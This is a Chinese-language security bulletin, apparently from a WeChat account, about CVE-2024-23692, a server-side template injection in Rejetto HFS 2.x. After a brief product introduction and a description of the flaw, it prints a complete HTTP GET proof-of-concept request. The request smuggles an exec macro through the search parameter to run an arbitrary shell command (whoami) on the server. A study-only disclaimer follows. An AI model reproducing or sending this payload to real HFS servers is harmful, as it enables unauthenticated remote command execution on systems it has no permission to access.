0x00 前言
HFS(HTTP File Server)是一个基于HTTP协议的文件服务器软件,允许用户通过浏览器访问和共享计算机上的文件。HFS的起源可以追溯到2002年,由Rejetto开发并发布。
HFS的主要特点包括界面简洁直观、易于安装和配置、支持虚拟文件系统、支持多种权限设置等。通过HFS,用户可以轻松地在本地网络或互联网上共享文件和文件夹,无需安装额外的软件,只需使用一个支持HTTP协议的浏览器即可访问和下载文件。
0x01 漏洞描述
根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
此模板包含来自请求的搜索查询参数的内容,该内容未正确转义,从而启用了 SSTI 在正常操作下,符号和宏会被编码以防止 SSTI。但是,通过强制服务器取消转义某些字符,攻击者可以将任意宏注入模板。
0x02 CVE编号
CVE-2024-23692
0x03 影响版本
Rejetto HFS 2.x
0x04 漏洞详情
POC:
GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: HFS_SID_=0.590236319694668
0x05 参考链接
https://github.com/rapid7/metasploit-framework/pull/19240
https://www.rejetto.com/hfs/?f=dl
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。